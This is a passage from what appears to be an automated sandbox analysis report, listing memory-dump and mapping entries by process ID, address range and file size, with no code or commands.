                                                                                                                                                                                                                                                                                                                                                                                      • memory/1360-274-0x00000000022F0000-0x00000000022F1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                                                                      • memory/1360-275-0x0000000003990000-0x0000000003991000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                                                                      • memory/1360-276-0x0000000002110000-0x000000000226C000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                        1.4MB

                                                                                                                                                                                                                                                                                                                                                                                      • memory/1360-277-0x000000006E861000-0x000000006E863000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                        8KB

                                                                                                                                                                                                                                                                                                                                                                                      • memory/1360-278-0x00000000039A0000-0x00000000039A1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                                                                      • memory/1360-279-0x00000000039B0000-0x00000000039B1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                                                                      • memory/1360-267-0x00000000005F0000-0x00000000005F1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                                                                      • memory/1360-280-0x00000000039C0000-0x00000000039C1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                                                                      • memory/1360-272-0x00000000022D0000-0x00000000022D1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                                                                      • memory/1368-107-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                      • memory/1492-321-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                      • memory/1572-308-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                      • memory/1572-186-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                      • memory/1596-178-0x00000000002F0000-0x0000000000370000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                        512KB

                                                                                                                                                                                                                                                                                                                                                                                      • memory/1596-167-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                      • memory/1716-137-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                      • memory/1736-327-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                      • memory/1744-62-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                      • memory/1752-184-0x00000000004D0000-0x0000000000541000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                        452KB

                                                                                                                                                                                                                                                                                                                                                                                      • memory/1752-181-0x00000000FFAC246C-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                      • memory/1772-111-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                      • memory/2008-160-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                      • memory/2096-261-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                      • memory/2132-189-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                      • memory/2132-191-0x00000000007F0000-0x00000000007F1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                                                                      • memory/2236-242-0x0000000000960000-0x0000000000961000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                                                                      • memory/2236-192-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                      • memory/2236-212-0x0000000000DA0000-0x0000000000DA1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                                                                      • memory/2260-238-0x0000000000B60000-0x0000000000B61000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                                                                      • memory/2260-194-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                      • memory/2260-246-0x0000000004910000-0x0000000004911000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                                                                      • memory/2272-195-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                      • memory/2288-197-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                      • memory/2312-243-0x0000000000400000-0x0000000002C79000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                        40.5MB

                                                                                                                                                                                                                                                                                                                                                                                      • memory/2312-199-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                      • memory/2312-235-0x0000000000240000-0x000000000026F000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                        188KB

                                                                                                                                                                                                                                                                                                                                                                                      • memory/2332-288-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                      • memory/2344-200-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                      • memory/2344-282-0x0000000000240000-0x000000000024A000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                        40KB

                                                                                                                                                                                                                                                                                                                                                                                      • memory/2356-201-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                      • memory/2388-325-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                      • memory/2424-205-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                      • memory/2440-207-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                      • memory/2440-315-0x0000000000400000-0x0000000002C6A000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                        40.4MB

                                                                                                                                                                                                                                                                                                                                                                                      • memory/2440-312-0x00000000002C0000-0x00000000002C9000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                        36KB

                                                                                                                                                                                                                                                                                                                                                                                      • memory/2480-247-0x0000000000400000-0x0000000002CBD000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                        40.7MB

                                                                                                                                                                                                                                                                                                                                                                                      • memory/2480-211-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                      • memory/2480-245-0x0000000003270000-0x000000000330D000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                        628KB

                                                                                                                                                                                                                                                                                                                                                                                      • memory/2488-209-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                      • memory/2532-319-0x0000000001C20000-0x0000000001C3B000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                        108KB

                                                                                                                                                                                                                                                                                                                                                                                      • memory/2532-215-0x00000000FFAC246C-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                      • memory/2532-220-0x0000000000480000-0x00000000004F4000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                        464KB

                                                                                                                                                                                                                                                                                                                                                                                      • memory/2532-320-0x0000000002A80000-0x0000000002B86000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                        1.0MB

                                                                                                                                                                                                                                                                                                                                                                                      • memory/2532-219-0x0000000000060000-0x00000000000AE000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                        312KB

                                                                                                                                                                                                                                                                                                                                                                                      • memory/2556-216-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                      • memory/2600-218-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                      • memory/2608-269-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                      • memory/2608-314-0x000000001AEB0000-0x000000001AEB2000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                        8KB

                                                                                                                                                                                                                                                                                                                                                                                      • memory/2644-233-0x00000000002C0000-0x00000000002D0000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                        64KB

                                                                                                                                                                                                                                                                                                                                                                                      • memory/2644-236-0x0000000000390000-0x00000000003A2000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                        72KB

                                                                                                                                                                                                                                                                                                                                                                                      • memory/2644-221-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                      • memory/2648-317-0x00000000050D0000-0x00000000050D1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                                                                      • memory/2648-291-0x0000000000418E5A-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                      • memory/2648-290-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                        120KB

                                                                                                                                                                                                                                                                                                                                                                                      • memory/2656-318-0x0000000004F20000-0x0000000004F21000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                                                                      • memory/2656-223-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                      • memory/2668-225-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                      • memory/2676-226-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                      • memory/2684-224-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                      • memory/2684-298-0x0000000003BC0000-0x000000000685A000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                        44.6MB

                                                                                                                                                                                                                                                                                                                                                                                      • memory/2684-310-0x0000000000400000-0x000000000309A000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                        44.6MB

                                                                                                                                                                                                                                                                                                                                                                                      • memory/2716-281-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                      • memory/2732-237-0x0000000000A10000-0x0000000000A11000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                                                                      • memory/2732-335-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                      • memory/2732-244-0x000000001AC30000-0x000000001AC32000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                        8KB

                                                                                                                                                                                                                                                                                                                                                                                      • memory/2732-227-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                      • memory/2732-241-0x0000000000880000-0x0000000000895000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                        84KB

                                                                                                                                                                                                                                                                                                                                                                                      • memory/2740-253-0x0000000001240000-0x0000000001241000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                                                                                      • memory/2740-256-0x000000001AF10000-0x000000001AF12000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                        8KB

                                                                                                                                                                                                                                                                                                                                                                                      • memory/2740-228-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                      • memory/2748-229-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                      • memory/2752-331-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                      • memory/2768-284-0x0000000000402E1A-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                      • memory/2768-283-0x0000000000400000-0x0000000000409000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                        36KB

                                                                                                                                                                                                                                                                                                                                                                                      • memory/2856-332-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                      • memory/2868-286-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                      • memory/2932-304-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                      • memory/2980-334-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                      • memory/3056-252-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                        80KB

                                                                                                                                                                                                                                                                                                                                                                                      • memory/3056-248-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                      • memory/3068-249-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                      • memory/3068-301-0x000000001AC00000-0x000000001AC02000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                                                                                        8KB